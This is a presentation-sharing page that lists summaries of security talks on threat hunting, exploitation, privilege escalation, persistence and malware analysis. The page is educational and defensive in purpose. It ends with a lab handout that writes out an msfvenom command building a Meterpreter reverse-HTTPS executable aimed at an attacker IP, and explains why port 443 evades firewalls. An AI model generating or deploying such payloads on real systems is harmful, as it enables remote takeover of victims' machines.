Hunting for APT in network logs workshop presentation - Oleh Levytskyi
Nonamecon 2021 presentation.
Network logs are one of the most efficient sources for hunting adversaries, but building good analytics capabilities requires a deep understanding of both benign activity and attacker behavior. This training focuses on detecting real-world attacks, tools and scenarios from the past year.
The training is highly interactive and strikes a good balance between theory and a lot of hands-on exercises, so that students get used to the detection engineering methodology and are prepared to start implementing it at their organizations.
Presentation topics:
- Netflow Mitre Matrix view
- Full packet captures vs Netflow
- Zeek
- Zeek packages
- RDP initial compromise
- Empire PowerShell and Cobalt Strike, or what to expect after initial loader execution
- Empire PowerShell initial connection
- Beaconing. RITA
- Scanning detection
- Internal enumeration detection
- Lateral movement techniques widely used
- Kerberos attacks
- PSExec and fileless ways of delivering payloads in the network
- Zerologon detection
- Data exfiltration
- Data exfiltration over C2 channel
- Data exfiltration using time size limits (data chunks)
- DNS exfiltration
- Detecting ransomware in your network
- Real incident investigation
Authors:
Oleh Levytskyi (https://twitter.com/LeOleg97)
Bogdan Vennyk (https://twitter.com/bogdanvennyk)
This talk focuses on various ways to attempt to be as much like normal users/behavior/traffic as possible. We also demonstrate the limitations of signature-based detection systems and then discuss a prototype Remote Access Tool (RAT) that is designed to blend in with normal activity.
Presented at CodeMash, January 8, 2014
This document discusses various techniques for exploiting UNIX executable programs, including buffer overflow vulnerabilities. It begins with an introduction and outlines an agenda covering vulnerable UNIX applications, memory layout and stacks, buffer overflows, shellcode, and various protection mechanisms and bypass techniques. These include basic stack overflows, bypassing password protections, limited stack spaces, Ret-2-libc exploits, and return-oriented programming (ROP) chains to execute multiple commands. Demo exploits are proposed to show gaining root privilege on vulnerable applications.
This document provides an overview of fuzzing techniques and the Sulley fuzzing framework. It begins with definitions of fuzzing and different fuzzing techniques like static testing, randomized fuzzing, and mutation-based fuzzing. The rest of the document demonstrates how to setup and use the Sulley framework to fuzz protocols like HTTP and file formats. It includes explanations of the Sulley API and how to generate test cases, monitor for crashes, and analyze results. Examples are provided of fuzzing HTTP servers and file formats.
This document provides instructions for hacking into various targets on a network to retrieve flags. It includes steps like port scanning with Nmap, cracking passwords, exploiting vulnerabilities like SQL injection and file inclusion, and using tools like Hydra, Burp Suite, and Metasploit to retrieve hashes, escalate privileges, and access remote systems. The flags are stored on the target systems in files or application interfaces.
Possibility of arbitrary code execution by Step-Oriented Programming - kozossakai
Step-Oriented Programming (SOP) allows executing arbitrary code on embedded systems by repeating step execution and changing the program counter value. A debugger communicates with a target system's stub using the Remote Serial Protocol to read/write memory and registers, enabling full control via simple commands if the connection is compromised. SOP constructs code by combining pieces of existing machine code and executes it without needing to directly inject new code. Therefore attacks are possible even if execution from data areas is prevented. The presentation will demonstrate this attack principle and results from actual experimentation.
Information Theft: Wireless Router Shareport for Phun and profit - Hero Suhar... - idsecconf
The document discusses exploiting vulnerabilities in wireless routers that have USB ports for sharing storage and printers. It describes conducting attacks against a D-Link wireless router to steal data, delete data, and implant backdoors by accessing the shared USB flash drive and printer through the router's vulnerable SharePort technology. The attacker scans the wireless network, identifies the router and connected USB devices, and then explores ways to hack into the shared resources and conduct unauthorized activities.
Monit is a utility that monitors processes, files, directories, and devices on a Unix system. It conducts automatic maintenance and repair. Monit can start processes that are not running, restart processes that are not responding, and stop processes that are using too many resources. It monitors services and items for changes and errors, and can send alerts about issues. Monit is configured via a control file and can monitor both local and remote systems. It provides a web interface for accessing status information.
This document provides an overview of several security tools including Nikto, Burp Suite, Wikto, Nmap, Metasploit, Nessus, OpenVAS, and how some of them relate to and integrate with Nikto. It describes Nikto as a web server scanner that checks for vulnerabilities. It then briefly introduces each of the other tools, their purpose, and in some cases how they can work with Nikto, such as Nikto being able to use Nmap scan results or output results to Metasploit's database.
Indicators of compromise: From malware analysis to eradication - Michael Boman
This document discusses detecting and analyzing indicators of compromise from a malware infection. It describes collecting data from firewalls, IDS/IPS, proxies, DNS logs, and system logs to detect suspicious activity. Once a potential malware sample is acquired, static and dynamic analysis techniques are used to analyze its behavior and identify indicators that can be used to detect infected machines, like created files, registry keys, and network traffic. These indicators are expressed using tools like Yara rules and Snort signatures to enable detection of the compromise across an environment.
The document discusses techniques for conducting a "grey-box" attack on Windows and Linux systems. It covers scanning and enumeration of open ports and services using Nmap to identify vulnerabilities. It then discusses methods for gaining initial access, including exploiting the null session vulnerability in Windows 2000 to enumerate user accounts. It also discusses privilege escalation techniques to gain full control of compromised systems. The document provides examples using Nmap and Metasploit to automate vulnerability scanning and exploitation.
This document discusses various options for centralized logging, including using syslog, Monolog, and logging software like Graylog. It provides examples of logging from PHP, MySQL, and Apache to a remote syslog server using Monolog and a FIFO pipe. Centralized logging with a software like Graylog allows for unified logging, search, alerts and reporting across multiple systems.
Laura Garcia - Shodan API and Coding Skills [rooted2019] - RootedCON
Laura García presents shodan-seeker, a Python tool she created for interacting with the Shodan API. The tool allows users to scan IP addresses and networks, get information on IPs from Shodan's database, detect new services, create and manage alerts, and subscribe to the streaming API. Some key features highlighted are diffing to detect new open ports, generating reports without consuming API credits, and full customization of input data, outputs, and alerts. Technical issues that may occur and how to address them are also covered.
The document provides instructions on how to configure an SSH server on Linux, perform footprinting and reconnaissance, scanning tools and techniques, enumeration tools and techniques, password cracking techniques and tools, privilege escalation methods, and keylogging and hidden file techniques. It discusses active and passive footprinting, Nmap port scanning, NetBIOS and SNMP enumeration, Windows password hashes, the sticky keys method for privilege escalation, ActualSpy keylogging software, and hiding files using NTFS alternate data streams. Countermeasures for many of these techniques are also outlined.
The document discusses footprinting techniques for security auditors. It covers gathering publicly available information about targets through tools like Whois, DNS lookups, search engines and network mappers to identify domains, IP addresses, systems and names. It then discusses active footprinting using port scanners like NMAP to detect open ports and services, identify operating systems and check for vulnerabilities. NMAP scripts can automate tasks like banner grabbing, HTTP enumeration and vulnerability detection for services like MySQL. Other tools mentioned include Maltego, Shodan, Censys and the NSE script library for more advanced information gathering.
The Art of Exploiting Unconventional Use-after-free Bugs in Android Kernel by... - CODE BLUE
In this talk, we are going to disclose two unconventional Use-after-free kernel bugs on Android we found last year, and introduce the new techniques we used to make these exploits 100% reliable.
The first bug is CVE-2017-0403, which we used to gain root privilege on almost all devices shipped with a 3.10 or earlier Linux kernel last year. So far more than 14 million users have successfully rooted their smartphones with this exploit. With this vulnerability, an attacker can only overwrite the freed object at a fixed offset with a pointer to the object itself. Achieving kernel code execution with this bug can be very challenging. To solve the problem, we propose a new method that uses iovec to re-fill the freed object and compromises the pipe subsystem in the kernel. In this way we can convert this unusual memory corruption into an arbitrary kernel memory overwrite.
The second bug is CVE-2016-6787. The bug is a UAF due to a race condition; it may corrupt a critical kernel structure and lead to a kernel crash when the scheduler switches context back to the attacker's process. So we'll introduce a way to freeze the attacker's process soon after the UAF happens, stop the kernel from crashing, and make the exploit reliable.
In summary, this presentation presents the new techniques for exploiting use-after-free bugs that we recently found in the Android kernel. The exploitation ideas are fresh, and the details of the bugs have never been discussed before.
Richard Wartell - Malware is hard. Let's go shopping!! - Shakacon
Writing a successful, protected, targeted, malicious binary is a software development task that requires great skill. A well-written piece of targeted malware should evade anti-virus solutions, hide its network communications, protect itself against reverse engineering, and clean up any forensic evidence of its existence on the system. However, writing a mediocre piece of targeted malware that works most of the time is easy. There are many publicly available backdoors, downloaders, and keyloggers that require little to no expertise to use, and poorly trained malware authors try to roll their own all the time.
Working in malware detection and reverse engineering, I see some of the intelligent choices malware authors make, but more often I see the hilariously poor code they write. During this talk I will demonstrate how to reverse engineer real world malware. I will focus on samples with interesting and comical mistakes, as well as samples that are impressive and well written.
This document provides an introduction and overview to using the BackTrack 4 penetration testing Linux distribution. It discusses the backgrounds of the presenters Jorge Orchilles and Peter Greko. It then outlines how to install and configure BackTrack, demonstrating some initial reconnaissance tools like nmap. It provides a sample penetration testing scenario, walking through information gathering, vulnerability scanning with Nessus and Nikto, gaining initial access via password cracking, and privilege escalation. The presentation emphasizes the importance of permission, documentation, and problem-solving to advance in a scenario.
A New Era of SSRF - Exploiting URL Parser in Trending Programming Languages! ... - CODE BLUE
We propose a new exploit technique that brings a whole new attack surface for bypassing SSRF (Server Side Request Forgery) protections. This is a very general attack approach, which we used in combination with our own fuzzing tool to discover many 0days in the built-in libraries of very widely used programming languages, including Python, PHP, Perl, Ruby, Java, JavaScript, Wget and cURL. The root cause of the problem lies in the inconsistency between URL parsers and URL requesters.
Being a very fundamental problem that exists in built-in libraries, sophisticated web applications such as WordPress (27% of the Web), vBulletin, MyBB and GitHub can also suffer from it, and 0days have been discovered in them via this technique. This general technique can also adapt to various code contexts and lead to protocol smuggling and SSRF bypassing. Several scenarios will be demonstrated to illustrate how URL parsers can be exploited to bypass SSRF protection and achieve RCE (Remote Code Execution), which is the case in our GitHub Enterprise demo.
Once the audience understands the basics of this technique, they won't be surprised to learn that more than 20 vulnerabilities have been found via it in the aforementioned programming languages and web applications.
Hacking Highly Secured Enterprise Environments by Zoltan Balazs - Shakacon
In theory, post-exploitation after having remote access is easy. Also in theory, there is no difference between theory and practice. In practice, there is. Imagine a scenario where the hacker/penetration-tester has deployed malware on a user's workstation, but the target information is on a secure server accessed via two-factor authentication, with screen access only (e.g. RDP, Citrix, etc.). On top of that, the server runs application white-listing, and only the inbound port to the screen server (e.g. 3389) is allowed through the hardware firewall. But you also need persistent interactive C&C communication (e.g. Netcat, Meterpreter, RAT) to this server through the user's workstation.
I developed (and will publish) two tools that help the community in these situations. The first tool can drop malware to the server through the screen while the user is logged in. The second tool can help to circumvent the hardware firewall after one can execute code on the server with admin privileges (using a signed kernel driver). My tools have been tested against Windows Server 2012 and Windows 8, and they work with RDP or other remote desktops (e.g. Citrix). The number of problems one can solve with them is endless, e.g. communicating with a bind shell on a web server behind a restricted DMZ. Beware, live demo and fun included!
TRENDnet IP Camera Multiple Vulnerabilities - insight-labs
1. The TRENDnet IP camera model TV-IP422W contains multiple vulnerabilities, including an arbitrary file upload vulnerability that allows attackers to upload malicious files like webshells to the device.
2. The camera stores its configuration file unencrypted except for a simple bitwise NOT and XOR encryption that is easily reversible. This exposes passwords and credentials to attackers.
3. The SecurViewMobile Android app for the camera stores passwords and credentials in plaintext in an insecure manner, allowing extraction from its database.
Sheila Ayelen Berta - The Art of Persistence: "Mr. Windows… I don’t wanna go ... - RootedCON
The document discusses various techniques for achieving persistence on a Windows system without administrator privileges. These include hijacking shell extensions and COM objects by modifying registry keys, taking advantage of globally unique identifiers (GUIDs) and paths stored in the registry. The document recommends hijacking extension handlers and using PowerShell to bypass restrictions when writing to the registry for stealthier persistence.
"A rootkit writer’s guide to defense" - Michal Purzynski - PROIDEA
Michal will take you on a journey all the way to the 90’s and back, sharing the Mozilla detection framework - a systematic way to detect and hunt down threat actors. Why did we spend hours digging through some old Phrack issues? How does a blue team member approach writing rootkits? What is better - a false negative or a false positive? I will share answers to these questions plus a lot of alerting and evil-doing code.
Monit is an open source tool that monitors systems and applications and automatically restarts services if they fail or exceed configurable resource limits. It can monitor files, directories, processes, hosts, and custom scripts/programs. Monit is configured via a global configuration file and additional files for specific checks. It can monitor system resources, file integrity, network interfaces, remote hosts, and check for service dependencies. Monit also includes a web interface for monitoring and management.
PyCon India 2009 Presentation - Python tools for Network Security
The document discusses various Python tools for network security including Pypcap, Dpkt and Scapy. It provides an overview of packet capture and inspection capabilities of these tools and code examples to capture and analyze network packets. Specific examples demonstrated include an HTTP protocol sniffer, host scanning and DNS queries using Scapy.
PowerShell is liked by admins and developers, and most of all by hackers. Being the native shell of Windows systems, it does not attract attention while offering enormous offensive capabilities. During the talk Paweł will present both effective one-liners and multi-line scripts that can wreak havoc in an unprepared organization. Expect interesting C2 channels, malware written entirely in PowerShell, finding and exploiting poorly configured MSSQL servers, etc. 100% substance.
40 Methods for Privilege Escalation - Part 1
Privilege escalation is the act of exploiting a bug, a design flaw, or a configuration oversight in an operating system or software application to gain elevated access to resources that are normally protected from an application or user.
The first part of the privilege escalation methods, with complete descriptions:
1. Abusing Sudo Binaries
2. Abusing Scheduled Tasks
3. Golden Ticket With Scheduled Tasks
4. Abusing Interpreter Capabilities
5. Abusing Binary Capabilities
6. Abusing ActiveSessions Capabilities
7. Escalate with TRUSTWORTHY in SQL Server
8. Abusing Mysql run as root
9. Abusing journalctl
10. Abusing VDS
11. Abusing Browser
12. Abusing LDAP
13. LLMNR Poisoning
14. Abusing Certificate Services
15. MySQL UDF Code Injection
16. Impersonation Token with ImpersonateLoggedOnuser
17. Impersonation Token with SeImpersonatePrivilege
18. Impersonation Token with SeLoadDriverPrivilege
19. OpenVPN Credentials
20. Bash History
21. Package Capture
22. NFS Root Squashing
23. Abusing Access Control List
24. Escalate With SeBackupPrivilege
25. Escalate With SeImpersonatePrivilege
26. Escalate With SeLoadDriverPrivilege
27. Escalate With ForceChangePassword
28. Escalate With GenericWrite
29. Abusing GPO
30. Pass-the-Ticket
31. Golden Ticket
32. Abusing Splunk Universal Forwarder
33. Abusing Gdbus
34. Abusing Trusted DC
35. NTLM Relay
36. Exchange Relay
37. Dumping with diskshadow
38. Dumping with vssadmin
39. Password Spraying
40. AS-REP Roasting and Kerberoasting
Information Theft: Wireless Router Shareport for Phun and profit - Hero Suhar...idsecconf
The document discusses exploiting vulnerabilities in wireless routers that have USB ports for sharing storage and printers. It describes conducting attacks against a D-Link wireless router to steal data, delete data, and implant backdoors by accessing the shared USB flash drive and printer through the router's vulnerable SharePort technology. The attacker scans the wireless network, identifies the router and connected USB devices, and then explores ways to hack into the shared resources and conduct unauthorized activities.
Monit is a utility that monitors processes, files, directories, and devices on a Unix system. It conducts automatic maintenance and repair. Monit can start processes that are not running, restart processes that are not responding, and stop processes that are using too many resources. It monitors services and items for changes and errors, and can send alerts about issues. Monit is configured via a control file and can monitor both local and remote systems. It provides a web interface for accessing status information.
This document provides an overview of several security tools including Nikto, Burp Suite, Wikto, Nmap, Metasploit, Nessus, OpenVAS, and how some of them relate to and integrate with Nikto. It describes Nikto as a web server scanner that checks for vulnerabilities. It then briefly introduces each of the other tools, their purpose, and in some cases how they can work with Nikto, such as Nikto being able to use Nmap scan results or output results to Metasploit's database.
Indicators of compromise: From malware analysis to eradicationMichael Boman
This document discusses detecting and analyzing indicators of compromise from a malware infection. It describes collecting data from firewalls, IDS/IPS, proxies, DNS logs, and system logs to detect suspicious activity. Once a potential malware sample is acquired, static and dynamic analysis techniques are used to analyze its behavior and identify indicators that can be used to detect infected machines, like created files, registry keys, and network traffic. These indicators are expressed using tools like Yara rules and Snort signatures to enable detection of the compromise across an environment.
The document discusses techniques for conducting a "grey-box" attack on Windows and Linux systems. It covers scanning and enumeration of open ports and services using Nmap to identify vulnerabilities. It then discusses methods for gaining initial access, including exploiting the null session vulnerability in Windows 2000 to enumerate user accounts. It also discusses privilege escalation techniques to gain full control of compromised systems. The document provides examples using Nmap and Metasploit to automate vulnerability scanning and exploitation.
This document discusses various options for centralized logging, including using syslog, Monolog, and logging software like Graylog. It provides examples of logging from PHP, MySQL, and Apache to a remote syslog server using Monolog and a FIFO pipe. Centralized logging with a software like Graylog allows for unified logging, search, alerts and reporting across multiple systems.
Laura Garcia - Shodan API and Coding Skills [rooted2019]RootedCON
Laura García presents shodan-seeker, a Python tool she created for interacting with the Shodan API. The tool allows users to scan IP addresses and networks, get information on IPs from Shodan's database, detect new services, create and manage alerts, and subscribe to the streaming API. Some key features highlighted are diffing to detect new open ports, generating reports without consuming API credits, and full customization of input data, outputs, and alerts. Technical issues that may occur and how to address them are also covered.
The document provides instructions on how to configure an SSH server on Linux, perform footprinting and reconnaissance, scanning tools and techniques, enumeration tools and techniques, password cracking techniques and tools, privilege escalation methods, and keylogging and hidden file techniques. It discusses active and passive footprinting, Nmap port scanning, NetBIOS and SNMP enumeration, Windows password hashes, the sticky keys method for privilege escalation, ActualSpy keylogging software, and hiding files using NTFS alternate data streams. Countermeasures for many of these techniques are also outlined.
The document discusses footprinting techniques for security auditors. It covers gathering publicly available information about targets through tools like Whois, DNS lookups, search engines and network mappers to identify domains, IP addresses, systems and names. It then discusses active footprinting using port scanners like NMAP to detect open ports and services, identify operating systems and check for vulnerabilities. NMAP scripts can automate tasks like banner grabbing, HTTP enumeration and vulnerability detection for services like MySQL. Other tools mentioned include Maltego, Shodan, Censys and the NSE script library for more advanced information gathering.
The Art of Exploiting Unconventional Use-after-free Bugs in Android Kernel by...CODE BLUE
In this talk, we are going to disclose two unconventional Use-after-free kernel bugs on Android we found last year, and introduce the new techniques we used to make these exploits 100% reliable.
The first bug is CVE-2017-0403, which we used to gain root privilege on almost all devices shipped with 3.10 or earlier Linux kernel last year. So far more than 14 million users have successfully rooted their smartphones with this exploit. With this vulnerability, an attacker only can overwrite the freed object at a fixed offset with a pointer to object itself. How to achieve kernel code execution with this bug can be very challenging.To solve the problem, we propose a new method which is using iovec to re-fill the freed object and compromising the pipe subsystem in kernel.In this way we can covert this unusual memory corruption to arbitrary kernel memory overwriting.
The second bug is CVE-2016-6787. The bug is an UAF due to race condition, may corrupt a critical kernel structure, and lead to the kernel crash when scheduler switched context back to attacker's process. So we'll introduce a way to freeze the attacker's process soon after UAF happened ,stop kernel from crashing, and make the exploit reliable.
In summary, this presentation gives out the new techniques of exploiting use-after-free bugs we just found in Android kernel. The ideas of exploitation are fresh, detail of bugs is also never discussed before.
Richard wartell malware is hard. let's go shopping!!Shakacon
Writing a successful, protected, targeted, malicious binary is a software development task that requires great skill. A well-written piece of targeted malware should evade anti-virus solutions, hide its network communications, protect itself against reverse engineering, and clean up any forensic evidence of its existence on the system. However, writing a mediocre piece of targeted malware that works most of the time is easy. There are many publicly available backdoors, downloaders, and keyloggers that require little to no expertise to use, and poorly trained malware authors try to roll their own all the time.
Working in malware detection and reverse engineering, I see some of the intelligent choices malware authors make, but more often I see the hilariously poor code they write. During this talk I will demonstrate how to reverse engineer real world malware. I will focus on samples with interesting and comical mistakes, as well as samples that are impressive and well written.
This document provides an introduction and overview to using the BackTrack 4 penetration testing Linux distribution. It discusses the backgrounds of the presenters Jorge Orchilles and Peter Greko. It then outlines how to install and configure BackTrack, demonstrating some initial reconnaissance tools like nmap. It provides a sample penetration testing scenario, walking through information gathering, vulnerability scanning with Nessus and Nikto, gaining initial access via password cracking, and privilege escalation. The presentation emphasizes the importance of permission, documentation, and problem-solving to advance in a scenario.
A New Era of SSRF - Exploiting URL Parser in Trending Programming Languages! ... (CODE BLUE)
We propose a new exploit technique that brings a whole new attack surface for bypassing SSRF (Server Side Request Forgery) protections. This is a very general attack approach, which we used in combination with our own fuzzing tool to discover many 0days in the built-in libraries of very widely used programming languages, including Python, PHP, Perl, Ruby, Java, JavaScript, Wget and cURL. The root cause of the problem lies in the inconsistency between URL parsers and URL requesters.
Being a very fundamental problem that exists in built-in libraries, sophisticated web applications such as WordPress (27% of the Web), vBulletin, MyBB and GitHub can also suffer, and 0days have been discovered in them via this technique. This general technique can also adapt to various code contexts and lead to protocol smuggling and SSRF bypassing. Several scenarios will be demonstrated to illustrate how URL parsers can be exploited to bypass SSRF protection and achieve RCE (Remote Code Execution), which is the case in our GitHub Enterprise demo.
Understanding the basics of this technique, the audience won't be surprised to know that more than 20 vulnerabilities have been found via it in the aforementioned programming languages and web applications.
Hacking Highly Secured Enterprise Environments by Zoltan Balazs (Shakacon)
In theory, post-exploitation after having remote access is easy. Also in theory, there is no difference between theory and practice. In practice, there is. Imagine a scenario where the hacker/penetration tester has deployed malware on a user's workstation, but the target information is on a secure server accessed via two-factor authentication, with screen access only (e.g. RDP, Citrix, etc.). On top of that, the server runs application whitelisting, and only the inbound port to the screen server (e.g. 3389) is allowed through the hardware firewall. But you also need persistent interactive C&C communication (e.g. Netcat, Meterpreter, RAT) to this server through the user's workstation.
I developed (and will publish) two tools that help the community in these situations. The first tool can drop malware onto the server through the screen while the user is logged in. The second tool can help to circumvent the hardware firewall once one can execute code on the server with admin privileges (using a signed kernel driver). My tools have been tested against Windows Server 2012 and Windows 8, and they work with RDP or other remote desktops (e.g. Citrix). The number of problems one can solve with them is endless, e.g. communicating with a bind shell on a webserver behind a restricted DMZ. Beware, live demo and fun included!
TRENDnet IP Camera Multiple Vulnerabilities (insight-labs)
1. The TRENDnet IP camera model TV-IP422W contains multiple vulnerabilities, including an arbitrary file upload vulnerability that allows attackers to upload malicious files such as webshells to the device.
2. The camera protects its stored configuration file only with a simple bitwise NOT and XOR encoding that is easily reversible. This exposes passwords and credentials to attackers.
3. The SecurViewMobile Android app for the camera stores passwords and credentials in plaintext in an insecure manner, allowing them to be extracted from its database.
Sheila Ayelen Berta - The Art of Persistence: "Mr. Windows… I don't wanna go ... (RootedCON)
The document discusses various techniques for achieving persistence on a Windows system without administrator privileges. These include hijacking shell extensions and COM objects by modifying registry keys, taking advantage of globally unique identifiers (GUIDs) and paths stored in the registry. The document recommends hijacking extension handlers and using PowerShell to bypass restrictions when writing to the registry for stealthier persistence.
"A rootkit writer's guide to defense" - Michal Purzynski (PROIDEA)
Michal will take you on a journey all the way back to the 90's and back again, sharing the Mozilla detection framework: a systematic way to detect and hunt down threat actors. Why did we spend hours digging through some old Phrack issues? How does a blue team member approach writing rootkits? What is better, a false negative or a false positive? I will share answers to these questions plus a lot of alerting and evil-doing code.
Monit is an open source tool that monitors systems and applications and automatically restarts services if they fail or exceed configurable resource limits. It can monitor files, directories, processes, hosts, and custom scripts/programs. Monit is configured via a global configuration file and additional files for specific checks. It can monitor system resources, file integrity, network interfaces, remote hosts, and check for service dependencies. Monit also includes a web interface for monitoring and management.
PyCon India 2009 Presentation Python tools for Network Security
The document discusses various Python tools for network security including Pypcap, Dpkt and Scapy. It provides an overview of packet capture and inspection capabilities of these tools and code examples to capture and analyze network packets. Specific examples demonstrated include an HTTP protocol sniffer, host scanning and DNS queries using Scapy.
Admins and developers like PowerShell, but hackers like it most of all. Being the native shell of Windows systems, it does not stand out, while at the same time offering enormous offensive capabilities. During the talk Paweł will present both effective one-liners and multi-line scripts that can wreak havoc in an unprepared organization. Expect interesting C2 channels, malware written entirely in PowerShell, finding and exploiting poorly configured MSSQL servers, etc. 100% meat, no filler.
40 Methods for Privilege Escalation - Part 1
Privilege escalation is the act of exploiting a bug, a design flaw, or a configuration oversight in an operating system or software application to gain elevated access to resources that are normally protected from an application or user.
The first part of the privilege escalation methods, with complete descriptions:
1. Abusing Sudo Binaries
2. Abusing Scheduled Tasks
3. Golden Ticket With Scheduled Tasks
4. Abusing Interpreter Capabilities
5. Abusing Binary Capabilities
6. Abusing ActiveSessions Capabilities
7. Escalate with TRUSTWORTHY in SQL Server
8. Abusing Mysql run as root
9. Abusing journalctl
10. Abusing VDS
11. Abusing Browser
12. Abusing LDAP
13. LLMNR Poisoning
14. Abusing Certificate Services
15. MySQL UDF Code Injection
16. Impersonation Token with ImpersonateLoggedOnUser
17. Impersonation Token with SeImpersonatePrivilege
18. Impersonation Token with SeLoadDriverPrivilege
19. OpenVPN Credentials
20. Bash History
21. Packet Capture
22. NFS Root Squashing
23. Abusing Access Control List
24. Escalate With SeBackupPrivilege
25. Escalate With SeImpersonatePrivilege
26. Escalate With SeLoadDriverPrivilege
27. Escalate With ForceChangePassword
28. Escalate With GenericWrite
29. Abusing GPO
30. Pass-the-Ticket
31. Golden Ticket
32. Abusing Splunk Universal Forwarder
33. Abusing Gdbus
34. Abusing Trusted DC
35. NTLM Relay
36. Exchange Relay
37. Dumping with diskshadow
38. Dumping with vssadmin
39. Password Spraying
40. AS-REP Roasting / Kerberoasting
Methods for Privilege Escalation Part One.pdf (rimaNova1)
The document provides 40 methods for privilege escalation on Linux and Windows systems, organized into different categories. Some of the methods involve abusing privileges of programs run as root like sudo, abusing interpreters with escalated capabilities, injecting code through SQL or Windows services, exploiting scheduled tasks, sniffing network traffic, enumerating bash history files, and more. Many of the techniques require finding and exploiting vulnerable configurations or bugs in programs or services to elevate privileges on the target system.
[CB20] Operation I am Tom: How APT actors move laterally in corporate network... (CODE BLUE)
This document discusses techniques used by threat actors to move laterally within corporate networks. It begins with an introduction and covers post-exploitation techniques including Mimikatz for credential theft, Skeleton Key and Wdigest for password dumping, webshell deployment on IIS and Exchange servers, and other miscellaneous techniques such as abusing VPNs and using rootkits. Precautions are provided for each technique discussed.
Penetrating Windows 8 with syringe utility (IOSR Journals)
This document discusses penetrating Windows 8 remotely using Metasploit framework and syringe utility. It begins with an introduction to penetration testing and Windows 8 security. It then describes using Metasploit to generate a payload, encoding it to evade detection, and injecting it into a Windows 8 system using syringe. This allows establishing a meterpreter session and compromising the system by migrating processes and accessing the C drive. It concludes that Windows 8 has strong security but syringe injections allow compromising it, and more exploits could be found to enhance efficacy.
This document discusses techniques for lateral movement that adversaries use to access and control remote systems on a network. It outlines various methods like exploiting vulnerabilities, abusing legitimate Windows features like Windows services, scheduled tasks, WMI, WinRM and DCOM. The document also discusses how blue teams can detect these techniques by monitoring authentication events, system events, object access logs, WMI activity and Windows remote management logs. It describes using tools like Oriana and frequency analysis to hunt for lateral movement indicators in Windows event logs collected via Windows Event Forwarding.
This document provides an overview and agenda for a Metasploit training session. It begins with a disclaimer that the information presented is for educational purposes only. The agenda includes introductions to Metasploit basics, information gathering, exploitation, Meterpreter basics and post-exploitation, Meterpreter scripts, Metasploit utilities like Msfpayload and Msfencode, client-side attacks, and auxiliary modules. Breaks for tea and lunch are also included on the agenda.
Derbycon 2017: Hunting Lateral Movement For Fun & Profit (Mauricio Velazco)
After obtaining an initial foothold on an environment, attackers are forced to embark in lateral movement techniques in order to be successful in identifying and exfiltrating sensitive information. To stay ahead of the bad guys, the Blue team needs to have a clear understanding of these techniques as well as the forensic artifacts these techniques leave behind on the victim hosts. Armed with this knowledge, we can proactively hunt for lateral movement in the environment before exfiltration can occur. This presentation will analyze Lateral Movement from both a Red and Blue team perspective and introduce Oriana, a lateral movement hunting tool that can assist the Blue team in catching the adversary.
The document describes basic concepts related to machines, hosts, clients, servers, workstations, processes, daemons, distributed systems, and kernels. It then provides details about the boot PROM including its functions, components, configuration information storage, and commonly used commands. Finally, it outlines the boot PROM booting process and describes emergency sequences and diagnostic modes that can be accessed using stop key sequences.
Penetration Testing and Intrusion Detection System (Bikrant Gautam)
This document provides an overview of penetration testing techniques, including forms of cyber attacks like buffer overflows and SQL injection. It discusses using Metasploit and other commercial tools like Canvas to conduct network penetration testing. It also covers post-exploitation techniques such as password cracking, privilege escalation, and data exfiltration. The goal of a penetration test is to simulate a real attack to evaluate system defenses and identify vulnerabilities.
Pursue the Attackers – Identify and Investigate Lateral Movement Based on Beh... (CODE BLUE)
The document discusses methods for identifying and investigating lateral movement by attackers during security incidents. It describes common tools and techniques used by attackers during different stages of an advanced persistent threat (APT) incident, including initial investigation, internal reconnaissance, spreading infection, and deleting evidence. The document analyzes logs and commands from past APT attacks to identify patterns in attacker behavior that can help with incident response. It notes that default system logs often do not provide enough information, so additional logging of events, processes, and network connections may be needed to fully trace attacker activities within a target network.
A journey through the years of UNIX and Linux service management (Lubomir Rintel)
This document provides a history of Unix and Linux service management from the early days of /etc/init through the development of systemd. It describes the issues with early init systems like limitations in flexibility, lack of monitoring, and inconsistencies. It then discusses how various operating systems attempted to address these problems through tools like SMF, launchd, upstart, and others. Finally, it provides an overview of how systemd comprehensively solves the issues through features like unit files, control groups, journald logging, and integration with the Linux kernel.
This document lists over 80 processes and services running on the system as well as registry entries and browser extensions installed. It provides a detailed summary of the system's running software and configuration.
This document provides an overview of several Windows command line tools including RUNAS, WMIC, and PSTools. It describes how each tool can be used to gather system information, manage processes and services, and make configuration changes remotely. Specific examples are given for using WMIC and PSTools to inventory software, view events logs, kill processes, and reboot systems remotely. The document emphasizes that these tools can provide valuable insights but also stresses the importance of monitoring changes made.
Lab-10 Malware Creation and Denial of Service (DoS) In t.docx (pauline234567)
Lab-10: Malware Creation and Denial of Service (DoS)
In this lab, you will create malware by using the Metasploit Framework. You will also launch a Denial of Service (DoS) attack.
Section-1: Create a Malware
Hackers usually create malicious files for different purposes, such as command and control, defense evasion, and persistence. Pentesters create malicious files for ethical purposes, such as performing tests to check the strength of the existing countermeasures. In this lab, you will create a malicious file, and you will explore the strategies to evade the antivirus systems.
Method-1: Create a malicious file by using msfvenom
1) Log in to Kali VM on your personal computer (as set up in Lab 1).
2) Open a terminal window by clicking the terminal icon on the taskbar.
3) Type the following command in the terminal window and press Enter:
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_https LHOST=10.10.10.10 LPORT=443 -f exe -o ethical.exe
You can copy this command and paste it into the terminal window of the Kali VM.
4) After running this command, a file named ethical.exe will be created.
Notes:
msfvenom is a command-line tool within the Metasploit Framework. It is used to create payloads such as malicious executables, shellcode and reverse shells. This page shows the different kinds of malicious payloads that can be generated with msfvenom; have a look at the headings: https://burmat.gitbook.io/security/hacking/msfvenom-cheetsheet. If you want to learn more about msfvenom, refer to https://www.offensive-security.com/metasploit-unleashed/msfvenom/
LHOST (Local Host): Specifies the attacker's IP address. When the victim runs this executable, it will establish a connection to that IP address. The IP address is 10.10.10.10. It is a randomly selected IP, and you will not connect to that IP in this lab.
LPORT (Local Port): Specifies the port on which the attacker machine (10.10.10.10) will listen for incoming connections from the victim machine. In this example, when the victim runs the executable, the victim's computer will create a connection to port 443 on the attacker machine (10.10.10.10). After the victim makes a connection to the attacker machine, the attacker can start performing malicious activities, including controlling the victim machine, accessing sensitive information, deleting files, etc.
Using port 443 for this malicious activity is the safest choice for hackers because it is one of the ports that is not blocked by firewalls and routers on the Internet and on LANs (Local Area Networks): it is the default port for TLS traffic (mostly encrypted web traffic).
Msfvenom uses the reverse_https payload to create the malicious file. Once the victim runs it, the malicious file makes a reverse HTTPS connection from the victim's computer to the attacker's.
The other parameters of msfvenom are relatively straightforward. x86 specifies t.
AMS Node Meetup December presentation Phusion Passenger (icemobile)
